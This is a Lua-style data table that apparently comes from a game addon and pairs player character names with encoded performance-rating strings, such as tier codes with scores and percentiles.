["Axiona"] = "CB:77/9%UM:156/45%",
["Heirophant"] = "CT:52/17%RB:279/66%RM:483/60%",
["Zugmedic"] = "UM:229/27%",
["Goxoy"] = "UB:313/44%RM:318/73%",
["Lacunae"] = "ET:619/82%LB:688/97%EM:875/90%",
["Orochii"] = "UB:255/32%EM:796/90%",
["Barbarus"] = "UM:130/36%",
["Stadium"] = "UT:299/42%EB:613/80%UM:275/32%",
["Rezwoy"] = "CB:101/13%UM:304/31%",
["Coercion"] = "LB:771/97%LM:957/96%",
["Snowfrog"] = "CB:60/7%EM:794/88%",
["Qyzu"] = "CT:31/2%RB:451/65%EM:362/78%",
["Dothic"] = "UM:212/27%",
["Limerancee"] = "CM:14/3%",
["Ráváged"] = "LB:793/98%LM:968/97%",
["Eviloto"] = "ET:614/86%EB:692/92%EM:730/88%",
["Adolance"] = "UB:375/49%UM:400/43%",
["Alluká"] = "CM:32/2%",
["Satboy"] = "UT:230/30%EB:645/83%RM:617/66%",
["Ikk"] = "UM:392/46%",
["Evilbeard"] = "UB:198/48%RM:704/74%",
["Dorios"] = "RB:551/74%EM:741/79%",
["Krryptik"] = "RM:503/69%",
["Thirtythree"] = "CB:148/18%RM:541/60%",
["Thesuperlock"] = "CB:85/10%UM:379/43%",
["Swopecut"] = "RB:571/73%EM:888/91%",
["Economie"] = "UM:262/26%",
["Marbarcy"] = "UM:370/43%",
["Huntmedaddy"] = "ET:696/90%LB:761/96%EM:889/92%",
["Foxxeh"] = "RM:627/73%",
["Pompompompom"] = "EB:719/92%EM:875/94%",
["Jaysa"] = "EB:632/83%EM:848/89%",
["Tonyaharding"] = "ET:636/84%EB:703/90%EM:730/78%",
["Anomally"] = "ET:430/94%EB:663/86%LM:777/95%",
["Banguss"] = "RB:185/54%UM:70/30%",
["Capone"] = "RB:447/61%RM:664/72%",
["Drippie"] = "UT:324/42%UB:317/45%EM:384/79%",
["Billybarker"] = "UM:127/38%",
["Dankgank"] = "CM:45/14%",
["Jarcli"] = "CB:86/21%CM:94/12%",
["Nerds"] = "RT:149/52%RB:472/63%RM:213/50%",
["Urmybstfrnd"] = "CT:120/15%UB:349/46%EM:668/90%",
["Dingir"] = "CM:24/4%",
["Pofd"] = "RM:274/68%",
["Halotwo"] = "EB:676/87%EM:561/86%",
["Healwa"] = "RM:207/50%",
["Squidge"] = "RT:193/64%RB:311/66%RM:584/63%",
["Hayte"] = "RM:535/61%",
["Momohunting"] = "EB:394/78%EM:420/77%",
["Rootless"] = "CT:0/1%CB:68/8%RM:342/66%",
["Francys"] = "RB:412/53%RM:506/53%",
["Nakataka"] = "UM:102/35%",
["Skandir"] = "LT:535/96%EB:716/91%EM:798/85%",
["Dzscipline"] = "RB:493/69%EM:702/80%",
["Fembot"] = "ET:309/81%EB:515/85%EM:846/94%",
["Whuawrang"] = "RT:213/71%EB:701/90%EM:881/91%",
["Sylkyjonson"] = "RB:522/69%RM:534/60%",
["Sneaktrixx"] = "CT:89/11%UB:221/28%UM:420/48%",
["Hialeah"] = "RT:445/60%EB:690/88%EM:792/84%",
["Dragondoor"] = "ET:720/92%EB:662/85%EM:758/82%",
["Thiel"] = "EB:604/85%EM:827/91%",
["Pyungcheon"] = "CM:190/23%",
["Skyzs"] = "ET:520/78%EB:512/78%EM:655/82%",
["Nono"] = "RB:485/62%EM:798/83%",
["Nextstep"] = "UM:315/37%",
["Wac"] = "EM:725/82%",
["Ddukka"] = "UB:253/29%RM:449/72%",
["Kocane"] = "UB:314/40%RM:630/69%",
["Biruta"] = "UT:360/47%RB:308/70%RM:510/60%",
["Crysti"] = "UB:121/32%RM:489/50%",
["Zhloeqt"] = "EB:639/82%LM:916/95%",
["Propylene"] = "RM:584/66%",
["Jawny"] = "RM:192/51%",
["Hpally"] = "UM:351/41%",
["Xirhaxis"] = "CM:154/18%",
["Liakza"] = "UB:233/31%RM:179/54%",
["Naganate"] = "RB:532/72%RM:577/64%",
["Ferociouslut"] = "RB:416/56%RM:655/70%",
["Anxiously"] = "CM:168/22%",
["Periodblood"] = "CB:31/23%UM:216/25%",
["Sapotage"] = "UB:132/32%CM:85/11%",
["Pneumo"] = "RB:282/62%RM:309/63%",
["Ulvera"] = "CB:99/9%UM:318/33%",
["Rabegar"] = "RM:541/61%",
["Gholmore"] = "CB:27/0%UM:72/27%",
["Darinoxcow"] = "CM:31/1%",
["Catspajamas"] = "UB:53/36%LM:922/96%",
["Sunspot"] = "UM:151/47%",
["Soosano"] = "RM:632/70%",
["Gagedd"] = "CM:159/22%",
["Venerated"] = "UB:323/44%RM:433/51%",
["Panstradamus"] = "RT:545/73%EB:735/93%EM:836/88%",
["Moiraananke"] = "CB:43/4%RM:604/62%",
["Gjalplen"] = "RM:533/62%",
["Dhamgurl"] = "RB:407/55%EM:808/86%",
["Adiosamigo"] = "UB:141/34%RM:546/61%",
["Hogfish"] = "CB:80/10%UM:120/34%",
["Trollya"] = "UM:215/27%",
["Aylea"] = "CM:51/16%",
["Jinjah"] = "RB:466/64%UM:120/39%",
["Af"] = "ET:685/89%LB:717/95%LM:889/96%",
["Barelylethal"] = "EM:449/80%",
["Aquatic"] = "ET:674/88%EB:667/90%EM:457/85%",
["Mourn"] = "UM:180/45%",
["Fyher"] = "UB:108/28%RM:569/63%",
["Goldtech"] = "CT:10/8%UM:98/37%",
["Lolymorphs"] = "RB:243/61%RM:309/72%",
["Môôse"] = "EB:397/89%EM:440/88%",
["Quiccs"] = "UT:138/49%EB:677/85%EM:590/86%",
["Brothanature"] = "RB:287/68%EM:539/77%",
["Friezen"] = "UT:297/38%UB:278/35%RM:297/71%",
["Majakì"] = "CB:28/0%RM:269/71%",
["Friok"] = "CT:57/6%EB:358/78%EM:632/93%",
["Promissory"] = "EM:808/82%",
["Urkizzle"] = "EB:696/88%EM:746/81%",
["Jobcho"] = "CT:4/3%CB:127/16%CM:94/12%",
["Fixayte"] = "EB:635/82%RM:653/69%",
["Kempis"] = "UM:375/47%",
["Färmer"] = "CB:31/1%UM:240/31%",
["Anggie"] = "CB:117/11%CM:168/19%",
["Handikappa"] = "CT:2/6%EB:387/81%EM:742/84%",
["Xeine"] = "CT:36/3%RB:550/74%RM:224/57%",
["Barka"] = "ET:570/83%EB:549/78%EM:760/88%",
["Bearoids"] = "CB:127/13%RM:475/56%",
["Croisx"] = "RT:413/54%RB:365/52%EM:458/82%",
["Timara"] = "CT:34/9%RM:501/54%",
["Squad"] = "CB:70/8%RM:286/60%",
["Chickamauga"] = "RM:592/63%",
["Galieana"] = "CM:189/22%",
["Hugglebug"] = "RB:414/54%UM:286/34%",
["Zharalim"] = "UM:255/30%",
["Yhivi"] = "CB:73/9%RM:602/62%",
["Frozeado"] = "RM:178/54%",
["Howitzerx"] = "RM:524/58%",
["Loadtank"] = "UB:30/29%UM:88/29%",
["Sakurahime"] = "UM:187/48%",
["Aoespec"] = "UT:356/46%EB:616/81%EM:530/89%",
["Scalabrine"] = "EB:637/81%EM:766/80%",
["Joocee"] = "ET:689/90%EB:621/85%EM:759/85%",
["Sslave"] = "CM:27/1%",
["Squirtyfarmy"] = "UM:373/47%",
["Skinnyp"] = "LT:476/95%EB:639/83%EM:808/86%",
["Urbanyouth"] = "CM:55/6%",
["Mememepls"] = "EB:665/85%EM:711/78%",
["Gremma"] = "EM:375/85%",
["Chobobird"] = "CT:45/14%CB:51/5%CM:46/14%",
["Saomm"] = "RM:321/73%",
["Gonnaflashya"] = "CT:96/10%RB:357/50%EM:401/75%",
["Dalige"] = "UM:112/38%",
["Whistflecha"] = "RB:249/59%RM:254/62%",
["Foodstamp"] = "UT:219/29%RB:392/55%RM:452/50%",
["Nullx"] = "UM:123/39%",
["Ichot"] = "UB:198/26%EM:752/85%",
["Ryakosu"] = "ET:619/77%EB:452/87%UM:71/38%",
["Nazgulz"] = "RT:511/68%RB:459/66%RM:477/60%",
["Fallgoose"] = "RB:496/67%EM:834/86%",
["Gumx"] = "EB:625/79%RM:646/69%",
["Floke"] = "RB:415/54%UM:378/43%",
["Asgardian"] = "UM:413/42%",
["Brenden"] = "CT:113/19%UB:288/36%UM:163/46%",
["Microbis"] = "RB:390/57%RM:542/67%",
["Flarehoof"] = "RB:382/54%RM:558/65%",
["Happypants"] = "ET:294/86%EB:661/86%EM:881/90%",
["Amneg"] = "EM:726/78%",
["Nevster"] = "ET:279/83%EB:606/94%EM:675/75%",
["Smellydumps"] = "ET:285/83%EB:476/90%EM:849/89%",
["Soz"] = "LT:527/96%EB:670/86%EM:733/76%",
["Brumok"] = "UB:304/40%UM:127/35%",
["Pollygone"] = "RM:572/63%",
["Noyourecute"] = "UB:202/49%RM:694/73%",
["Beautifulem"] = "ET:271/82%RB:327/69%EM:764/83%",
["Recrisdagg"] = "RM:342/67%",
["Cameltoetom"] = "RB:224/55%CM:88/9%",
["Kkurbb"] = "ET:399/85%UB:131/34%RM:349/65%",
["Kimetsu"] = "LT:572/97%SB:770/99%LM:872/98%",
["Bigfragger"] = "LT:459/95%EB:592/93%EM:585/87%",
["Dàrkmagician"] = "UM:65/25%",
["Thundology"] = "CB:58/4%RM:268/62%",
["Cosmo"] = "RM:317/67%",
["Mjinbuu"] = "EM:674/78%",
["Duquonda"] = "UB:253/34%CM:143/19%",
["Sumbum"] = "CM:176/22%",
["Archjester"] = "UT:100/37%RB:516/66%RM:303/62%",
["Hunari"] = "CM:136/19%",
["Kabaka"] = "RM:462/69%",
["Crzyshot"] = "ET:635/84%EB:677/87%EM:877/91%",
["Cobu"] = "CM:46/5%",
["Pwna"] = "UB:223/29%UM:169/48%",
["Yissu"] = "CM:29/0%",
["Maryy"] = "RT:200/68%EB:545/93%RM:187/51%",
["Shazaam"] = "CB:27/4%UM:152/44%",
["Teanswer"] = "CT:120/20%UB:183/44%EM:547/86%",
["Slynkleton"] = "UM:100/33%",
["Worlord"] = "RM:206/52%",
["Huntermu"] = "ET:249/78%EB:479/86%EM:863/90%",
["Rouqiu"] = "RB:442/58%RM:217/54%",
["Jarvanvi"] = "CT:32/12%UB:204/48%UM:255/30%",
["Baoz"] = "RB:397/73%RM:226/56%",
["Rukiku"] = "RM:448/50%",
["Cromat"] = "UM:248/30%",
["Mylez"] = "UM:118/37%",
["Chapterxi"] = "CM:54/20%",
["Halobravo"] = "UM:445/48%",
["Famisremer"] = "CB:27/0%",
["Aiofe"] = "EM:798/81%",
["Navia"] = "UT:245/29%RB:378/53%UM:394/42%",
["Luvinesz"] = "CT:123/15%UM:284/33%",
["Mysticbeast"] = "RT:423/59%RB:224/54%RM:683/74%",
["Globgob"] = "CM:178/17%",
["Buschh"] = "RM:297/65%",
["Mathematic"] = "EB:435/87%EM:446/84%",
["Lucien"] = "EM:356/77%",
["Sushyy"] = "CB:140/18%UM:350/40%",
["Xelas"] = "RM:232/62%",
["Scaringboys"] = "UB:192/26%UM:283/33%",
["Evilpotato"] = "RT:239/74%EB:739/93%EM:870/90%",
["Keefern"] = "RT:181/64%CB:118/14%UM:99/34%",
["Cupcake"] = "RB:421/52%UM:210/40%",
["Aguaho"] = "CT:114/14%EB:580/81%EM:792/88%",
["Soktime"] = "CT:39/16%CB:73/15%EM:571/76%",
["Zeitmjian"] = "UB:268/34%RM:241/54%",
["Magiç"] = "RM:155/50%",
["Christianly"] = "UT:67/30%UB:108/31%EM:551/90%",
["Vahrihn"] = "CM:60/23%",
["Uumlayen"] = "CM:54/4%",
["Wikileaks"] = "CM:52/16%",
["Slarzilla"] = "UM:80/27%",
["Kiwox"] = "UM:106/37%",
["Phøenix"] = "CT:93/16%UB:295/41%RM:243/64%",
["Mihai"] = "UB:343/47%RM:329/74%",
["Simsing"] = "UT:104/41%EB:614/85%EM:719/86%",
["Wrongturn"] = "CM:54/16%",
["Pennsylpwnya"] = "LB:770/98%SM:961/99%",
["Posersecks"] = "RB:559/73%EM:517/84%",
["Schizotypal"] = "CB:57/6%CM:173/23%",
["Hindrexic"] = "CM:12/7%",
["Babyfeet"] = "RM:666/72%",
["Scrubnoob"] = "RT:501/63%EB:552/77%EM:833/92%",
["Blueblueblue"] = "CM:188/23%",
["Jalan"] = "EB:603/88%EM:740/83%",
["Xiaohaihai"] = "RT:222/73%EB:617/81%RM:689/74%",
["Gnomedunx"] = "CM:141/13%",
["Yanis"] = "CB:72/8%UM:81/25%",
["Amend"] = "RB:424/60%UM:422/49%",
["Abbym"] = "CB:99/12%UM:444/49%",
["Midumi"] = "CB:64/6%UM:211/25%",
["Sandru"] = "EB:489/86%RM:612/66%",
["Ninainai"] = "CM:53/4%",
["Roughncek"] = "RM:234/58%",
["Saltmommy"] = "UB:305/36%RM:281/62%",
["Warming"] = "UB:99/26%UM:235/27%",
["Mmeimei"] = "UM:232/27%",
["Kirbyy"] = "UB:199/26%RM:514/60%",
["Pineappleva"] = "CT:130/16%CB:131/16%CM:184/22%",
["Aison"] = "UT:303/39%EB:596/78%EM:785/84%",
["Missouton"] = "UM:367/43%",
["Falsedawn"] = "EB:668/90%EM:817/90%",
["Badjapa"] = "EB:716/91%EM:805/83%",
["Nouseforname"] = "EM:741/80%",
["Cmjb"] = "CB:180/23%CM:98/12%",
["Soulpsyker"] = "LB:768/98%LM:955/98%",
["Lilthanos"] = "UT:216/32%RB:258/58%EM:428/77%",
["Escánór"] = "UB:302/36%UM:310/36%",
["Timot"] = "UT:169/35%RB:399/62%RM:484/69%",
["Thesuperelff"] = "UB:145/37%RM:567/63%",
["Andalon"] = "RB:472/64%RM:598/64%",
["Thorassian"] = "CT:76/7%RB:343/73%UM:240/27%",
["Lethi"] = "CB:171/18%UM:303/35%",
["Danieldevito"] = "UM:282/33%",
["Jabroned"] = "RM:489/57%",
["Leunstopable"] = "CT:89/8%RB:407/55%RM:545/59%",
["Qurse"] = "EM:391/76%",
["Saviorself"] = "UM:286/34%",
["Cozyblade"] = "CM:199/24%",
["Faerly"] = "RT:440/55%EB:613/85%RM:599/68%",
["Graduation"] = "CT:17/3%EB:668/86%EM:697/75%",
["Emelianenko"] = "UM:89/29%",
["Stephenlee"] = "CM:52/6%",
["Eldia"] = "RB:404/55%RM:274/63%",
["Heemann"] = "UT:108/42%RB:445/58%CM:40/12%",
["Tuuf"] = "EB:479/90%RM:592/69%",
["Wuts"] = "RB:500/68%EM:764/81%",
["Emokid"] = "UM:126/40%",
["Fatalp"] = "RM:491/57%",
["Gizmose"] = "CB:106/13%EM:780/82%",
["Noonnap"] = "ET:629/88%EB:656/89%EM:588/81%",
["Samb"] = "CB:27/0%UM:79/29%",
["Pokban"] = "RT:384/53%RB:560/74%EM:840/87%",
["Sockzy"] = "CB:27/2%RM:323/69%",
["Sparkzz"] = "UM:227/28%",
["Schlitzed"] = "UB:106/28%UM:75/28%",
["Malikutak"] = "CB:73/19%RM:512/57%",
["Oceansick"] = "UB:132/36%RM:333/74%",
["Rvy"] = "UM:227/26%",
["Lickboto"] = "CB:76/18%RM:320/67%",
["Crynthia"] = "UT:113/43%CB:103/13%RM:243/63%",
["Maevinn"] = "CT:111/14%UB:351/47%UM:320/36%",
["Twigglebow"] = "EB:418/81%EM:917/93%",
["Crazyheals"] = "CT:34/7%UB:133/30%UM:123/38%",
["Mikehunt"] = "CB:178/22%UM:348/39%",
["Slidini"] = "CB:71/8%CM:77/24%",
["Gloodezza"] = "EB:643/87%EM:700/80%",
["Cheesewiz"] = "UB:274/37%EM:673/94%",
["Slayve"] = "CB:96/10%UM:392/45%",
["Rize"] = "UB:112/27%UM:110/35%",
["Gorwin"] = "UB:165/32%RM:249/55%",
["Jólnak"] = "RM:197/53%",
["Zloy"] = "CT:27/5%UB:343/43%RM:567/64%",
["Rosine"] = "CM:66/8%",
["Rorathorga"] = "CT:166/21%EB:561/76%RM:599/66%",
["Plazmer"] = "UB:102/27%CM:177/21%",
["Omgkittenz"] = "UB:117/29%UM:413/47%",
["Tayter"] = "CT:30/7%UB:357/48%UM:308/34%",
["Hdin"] = "RM:487/53%",
["Guiltyy"] = "UB:236/28%EM:787/82%",
["Terroes"] = "CM:64/24%",
["Ascen"] = "CM:183/20%",
["Daddyshawn"] = "CT:40/12%RB:431/59%RM:517/54%",
["Kneat"] = "CM:0/0%",
["Bigbyshand"] = "CB:121/16%UM:289/35%",
["Fatrage"] = "CT:101/17%RB:538/71%RM:516/59%",
["Variate"] = "ET:210/77%RB:384/72%RM:338/64%",
["At"] = "RT:169/61%EB:733/92%EM:867/89%",
["Ironhyd"] = "UT:65/26%EB:425/81%CM:184/22%",
["Paterpan"] = "EB:611/88%LM:912/96%",
["Unirenret"] = "UB:234/29%EM:710/80%",
["Akenzi"] = "UT:203/26%EB:592/83%EM:836/92%",
["Stubbyy"] = "RM:421/50%",
["Oliveira"] = "UM:220/27%",
["Makuksu"] = "RM:247/61%",
["Avzye"] = "LT:656/98%EB:690/88%EM:731/78%",
["Youngji"] = "ET:431/94%CB:178/22%RM:240/63%",
["Kronax"] = "LT:561/97%EB:575/75%EM:706/77%",
["Asterin"] = "RT:473/64%EB:621/81%EM:404/76%",
["Lujuni"] = "RT:203/69%RB:506/67%RM:208/52%",
["Lantana"] = "RT:442/60%RB:494/65%RM:336/70%",
["Stankfog"] = "ET:681/93%LB:715/96%EM:807/93%",
["Brucedalee"] = "RT:433/69%EB:354/79%RM:445/66%",
["Panzervor"] = "ET:646/89%LB:741/95%EM:825/93%",
["Luya"] = "ET:700/94%SB:676/99%EM:710/88%",
["Quincylychee"] = "ET:711/92%LB:778/97%EM:902/92%",
["Sabermra"] = "RT:336/50%EB:431/76%RM:282/61%",
["Bjaded"] = "ET:678/91%EB:661/90%EM:702/86%",
["Amalgamate"] = "ET:315/85%EB:646/84%EM:671/91%",
["Earthstone"] = "ET:549/81%EB:607/84%EM:663/82%",
["Kakikukeko"] = "LT:728/96%SB:779/99%LM:897/97%",
["Luviq"] = "CM:115/16%",
["Socialmanlol"] = "RT:193/74%EB:465/89%EM:451/84%",
["Heckit"] = "UM:312/36%",
["Loinfeaster"] = "ET:321/82%EB:544/86%EM:560/79%",
["Isha"] = "ET:322/87%UB:151/41%CM:205/20%",
["Dyce"] = "RT:216/71%EB:608/80%EM:706/77%",
["Drexxan"] = "ET:299/84%RB:483/62%EM:750/79%",
["Unorthadoxx"] = "ET:272/80%RB:577/74%RM:679/72%",
["Vanesh"] = "CT:125/16%",
["Zombislayer"] = "CT:96/12%RB:547/74%EM:692/75%",
["Erpanglaozi"] = "RB:379/55%RM:200/57%",
["Shiftnbleed"] = "LT:763/98%LB:587/97%LM:854/95%",
["Xotrol"] = "RB:402/55%RM:590/63%",
["Dnastyone"] = "EB:732/93%RM:545/58%",
["Nynke"] = "EB:695/89%EM:891/91%",
["Bluetulip"] = "ET:389/85%EB:615/88%EM:694/86%",
["Lear"] = "UB:213/29%CM:173/16%",
["Dayvenie"] = "LB:760/95%LM:992/98%",
["Mh"] = "EB:562/78%EM:703/76%",
["Chitto"] = "CT:37/10%CB:67/18%RM:335/71%",
["Idiomatic"] = "EB:554/75%EM:723/78%",
["Kimmuriel"] = "CT:29/1%UB:334/46%UM:154/47%",
["Tinytower"] = "RB:232/62%EM:642/78%",
["Exarahn"] = "CM:28/8%",
["Zukay"] = "EB:697/92%EM:915/94%",
["Shinkaas"] = "CM:35/12%",
["Allmïght"] = "ET:283/84%EB:650/83%",
["Hatoo"] = "UT:213/28%UB:261/36%RM:613/67%",
["Wazdakkaa"] = "ET:622/82%EB:609/79%EM:846/93%",
["Debtandtaxes"] = "CT:33/1%RM:203/51%",
["Bigbepis"] = "UT:88/34%RB:461/64%RM:187/52%",
["Keck"] = "UM:425/46%",
["Possessions"] = "CB:172/21%UM:287/29%",
["Kjartann"] = "LT:511/96%EB:521/88%RM:509/52%",
["Junglegirl"] = "LT:651/98%LB:644/96%EM:794/83%",
["Donpup"] = "LT:727/95%LB:741/95%LM:925/96%",
["Mewph"] = "ET:237/89%EB:577/88%EM:376/84%",
["Klov"] = "CT:69/22%SB:779/99%SM:1018/99%",
["Midgeydeeps"] = "ET:654/86%EB:620/80%RM:585/66%",
["Altralord"] = "EM:895/91%",
["Remnoth"] = "UB:345/44%RM:604/62%",
["Lysi"] = "RB:474/63%EM:752/81%",
["Outfuel"] = "UT:249/33%UB:235/32%RM:313/72%",
["Zeong"] = "UB:175/44%UM:174/48%",
["Portalpimp"] = "CB:189/23%RM:638/70%",
["Bakabaka"] = "RM:536/58%",
["Buttercake"] = "LB:763/96%EM:930/94%",
["Wildanimal"] = "UT:119/46%UB:294/36%RM:508/58%",
["Chillbrah"] = "EB:597/79%EM:889/92%",
["Valserye"] = "RB:284/68%RM:239/63%",
["Blindy"] = "UB:107/26%UM:184/46%",
["Bowinkle"] = "EB:456/84%RM:317/68%",
["Udead"] = "EB:532/90%EM:632/88%",
["Aylla"] = "UB:175/48%RM:134/50%",
["Trazzyy"] = "EB:520/81%EM:793/91%",
["Angrykaren"] = "EM:433/83%",
["Xtent"] = "RM:548/59%",
["Onekick"] = "EB:625/82%RM:698/73%",
["Loadheals"] = "RT:216/68%RB:426/58%RM:557/62%",
["Bigbabyjesùs"] = "ET:529/85%EB:451/86%EM:878/94%",
["Revi"] = "ET:235/81%LB:650/98%EM:910/94%",
["Nubblies"] = "RT:203/69%EB:629/80%EM:772/81%",
["Gnams"] = "RB:509/73%EM:702/80%",
["Fiskerz"] = "EM:784/87%",
["Rougaine"] = "CB:39/7%RM:305/62%",
["Dmtsummons"] = "RB:390/52%UM:81/29%",
["Forict"] = "CB:64/17%UM:408/48%",
["Nicetrybroth"] = "CB:33/2%CM:33/2%",
["Annie"] = "UT:122/46%CB:70/19%CM:153/23%",
["Zerofox"] = "LT:759/97%LB:769/98%SM:1016/99%",
["Keepitrollin"] = "CB:35/1%",
["Arabelia"] = "CT:28/3%CB:87/24%RM:500/59%",
["Jalila"] = "UB:127/31%UM:381/44%",
["Ripjaw"] = "RT:207/67%EB:633/82%EM:748/78%",
["Lunatix"] = "CB:78/9%EM:705/75%",
["Amazinthree"] = "RB:482/68%EM:859/93%",
["Bigpimpy"] = "RB:418/56%RM:572/63%",
["Aquatechnic"] = "EB:574/80%EM:801/89%",
["Silkyjackson"] = "EB:596/82%EM:748/81%",
["Zestypasta"] = "UB:259/33%CM:70/5%",
["Gunwithfaith"] = "RB:468/61%EM:739/78%",
["Wilddots"] = "UB:195/47%",
["Dontplaymage"] = "CB:178/23%UM:383/41%",
["Efa"] = "RT:76/58%RB:224/70%RM:305/62%",
["Dezolver"] = "RB:431/60%",
["Merdock"] = "EB:585/77%",
["Jackmcflamey"] = "CT:25/5%UB:299/42%CM:44/6%",
["Docblazed"] = "EB:685/88%EM:725/77%",
["Thîef"] = "RT:492/65%EB:587/77%RM:561/62%",
["Huntybaloo"] = "EB:602/78%RM:625/67%",
["Millayou"] = "CT:143/18%EB:584/93%LM:970/98%",
["Papasierra"] = "RM:660/72%",
["Jenter"] = "EB:689/88%RM:645/70%",
["Abey"] = "LB:749/97%LM:928/97%",
["Xeyne"] = "UB:277/37%UM:293/35%",
["Pyrodavè"] = "LB:770/97%EM:624/89%",
["Exxar"] = "CB:115/12%RM:676/74%",
["Samlion"] = "RT:530/70%EB:583/77%RM:501/55%",
["Clarota"] = "CB:40/4%RM:493/54%",
["Roor"] = "RM:659/72%",
["Omniia"] = "ET:508/90%EB:499/93%EM:784/91%",
["Gankfortrump"] = "UB:97/27%CM:156/21%",
["Peed"] = "UB:358/48%EM:748/80%",
["Marcey"] = "RB:487/65%UM:431/48%",
["Moomochan"] = "RT:130/55%RB:396/55%EM:362/78%",
["Junot"] = "UB:202/49%RM:465/52%",
["Gorgadamork"] = "CT:68/23%CB:37/6%",
["Pickpockets"] = "UT:75/27%EB:604/79%RM:684/74%",
["Talent"] = "EB:617/80%EM:769/82%",
["Dizzì"] = "UB:343/43%RM:571/61%",
["Vanquished"] = "CB:59/13%UM:375/43%",
["Dadbaud"] = "LT:486/96%EB:669/87%EM:691/75%",
["ßâtman"] = "ET:647/85%EB:683/91%UM:357/42%",
["Kyptonyte"] = "EB:627/86%RM:642/70%",
["Mppooii"] = "EB:581/84%EM:595/77%",
["Palona"] = "UM:325/34%",
["Moistdadhole"] = "ET:710/91%EB:729/92%EM:828/88%",
["Kalelock"] = "ET:430/93%EB:688/88%EM:868/89%",
["Asanakasa"] = "CT:40/12%CB:26/0%CM:86/12%",
["Cattlaclysm"] = "RB:125/56%RM:205/54%",
["Cheefbeef"] = "RB:392/50%RM:492/56%",
["Mosenwater"] = "CM:54/20%",
["Oldseven"] = "CB:25/0%CM:83/12%",
["Frósted"] = "EB:562/78%RM:580/64%",
["Rabidbovine"] = "ET:228/77%EB:518/75%EM:889/94%",
["Evilstrike"] = "UB:193/46%RM:542/60%",
["Infallible"] = "LB:773/97%LM:936/95%",
["Lonehunter"] = "RT:512/70%EB:702/89%EM:793/83%",
["Slumgold"] = "RB:556/71%RM:558/60%",
["Shazahne"] = "CB:61/7%",
["Iceburg"] = "EB:609/80%EM:704/77%",
["Aoedemthots"] = "UT:277/35%UB:289/40%RM:631/69%",
["Upsilon"] = "ET:310/88%EB:568/80%EM:745/87%",
["Jabroniejr"] = "UT:126/48%EB:666/84%EM:741/78%",
["Pjun"] = "CB:36/2%UM:422/45%",
["Dumbledolf"] = "ET:380/92%EB:723/92%EM:828/88%",
["Imdrood"] = "RT:112/74%EB:432/76%RM:480/73%",
["Deadsheeran"] = "EB:674/87%EM:811/86%",
["Oldbilly"] = "EB:377/76%EM:791/82%",
["Zuraiz"] = "CB:69/7%CM:28/1%",
["Meitang"] = "UT:90/33%RB:550/73%",
["Sneakypup"] = "UB:330/43%EM:728/78%",
["Pvppaladin"] = "EB:615/84%EM:792/85%",
["Skysec"] = "EB:551/86%EM:672/86%",
["Required"] = "RB:493/66%UM:278/33%",
["Forsetti"] = "EB:666/92%EM:811/90%",
["Newmzs"] = "UB:305/40%CM:195/24%",
["Lumanara"] = "LB:764/96%EM:862/89%",
["Hyperlink"] = "ET:656/86%EB:649/83%EM:769/83%",
["Imgrootz"] = "RB:454/64%EM:748/85%",
["Glåcius"] = "RM:499/59%",
["Eatmymag"] = "RT:202/69%UB:254/32%RM:251/65%",
["Kumatsu"] = "RT:234/74%RB:499/64%RM:597/64%",
["Opalias"] = "UT:108/37%RB:401/56%RM:235/58%",
["Lurel"] = "CT:62/22%CB:44/10%",
["Grampage"] = "UM:282/34%",
["Ivory"] = "ET:657/92%LB:722/95%LM:953/98%",
["Cleaver"] = "CT:31/7%UB:295/35%RM:500/57%",
["Swollennips"] = "RB:461/65%RM:596/66%",
["Hamberder"] = "RB:241/67%EM:571/83%",
["Attm"] = "EB:353/76%UM:207/29%",
["Shurmengrif"] = "RT:207/66%RB:255/65%RM:469/65%",
["Fearcovid"] = "RB:476/60%RM:540/57%",
["Limpi"] = "EB:384/76%RM:515/56%",
["Hiend"] = "UT:233/35%EB:464/89%EM:698/80%",
["Lirica"] = "CT:30/2%UB:144/37%UM:134/42%",
["Sugarma"] = "EB:367/79%RM:605/71%",
["Draxy"] = "CB:54/5%LM:961/97%",
["Aretard"] = "RB:392/51%RM:510/58%",
["Bekfast"] = "CT:0/1%CB:5/0%",
["Frostpotter"] = "UT:81/31%UB:143/39%EM:446/84%",
["Kehlthas"] = "CB:7/0%",
["Spitz"] = "UB:279/38%UM:258/31%",
["Dynna"] = "UT:192/25%RB:437/64%EM:591/92%",
["Consumable"] = "CB:33/2%",
["Davoodoos"] = "UT:203/26%EB:706/91%LM:960/97%",
["Nippur"] = "RT:518/69%EB:675/91%EM:861/91%",
["Ethylene"] = "CB:7/0%UM:101/38%",
["Tnk"] = "RT:213/72%CB:32/2%CM:60/14%",
["Hellaworried"] = "RT:245/67%RB:316/60%EM:664/79%",
["Aggee"] = "EB:581/77%UM:245/30%",
["Zez"] = "EB:557/78%EM:741/80%",
["Shuel"] = "EB:627/82%EM:711/76%",
["Yurdindin"] = "RB:425/54%RM:704/74%",
["Recond"] = "UB:224/30%",
["Soupbones"] = "CM:76/23%",
["Levinoss"] = "UT:196/29%UB:232/26%RM:226/55%",
["Hanzua"] = "CM:26/9%",
["Scottsfriend"] = "RM:337/71%",
["Bigandnasty"] = "RB:343/71%RM:633/66%",
["Nastytroll"] = "UM:71/27%",
["Baozisir"] = "UM:65/25%",
["Dergale"] = "RM:196/57%",
["Potatokitten"] = "EB:386/80%EM:413/79%",
["Mustanggt"] = "RM:301/65%",
["Iraqlobster"] = "UM:151/49%",
["Marefiore"] = "RM:227/61%",
["Natooka"] = "RM:262/62%",
["Andyshamberg"] = "RM:217/55%",
["Mandolo"] = "RB:332/69%RM:300/65%",
["Hakubi"] = "CB:38/3%EM:422/82%",
["Caliya"] = "CT:41/4%RM:293/61%",
["Kirogaw"] = "RM:205/53%",
["Domang"] = "SB:806/99%SM:960/99%",
["Babybwue"] = "RB:250/56%RM:470/53%",
["Crieton"] = "UM:313/37%",
["Idontrespond"] = "RM:494/55%",
["Mcfurious"] = "EM:731/80%",
["Gravejaw"] = "CT:160/21%EB:472/85%EM:604/88%",
["Gfc"] = "RB:234/54%RM:319/64%",
["Akuasama"] = "UB:97/27%CM:86/12%",
["Chanelwcoast"] = "CT:115/12%LB:742/96%EM:875/91%",
["Konfearacy"] = "CB:22/2%",
["Huntix"] = "UT:70/26%UB:104/27%CM:59/21%",
["Misogynybad"] = "UT:83/30%EB:459/83%EM:760/79%",
["Phakes"] = "CT:64/22%UB:125/30%UM:380/39%",
["Sakarai"] = "CB:174/22%UM:289/32%",
["Easylevels"] = "CB:45/10%UM:259/26%",
["Ghostsalt"] = "CM:53/6%",
["Hulkqt"] = "EB:705/89%LM:935/95%",
["Dyedberseker"] = "CB:38/7%UM:370/36%",
["Jayanisha"] = "CT:65/7%CB:183/23%RM:355/72%",
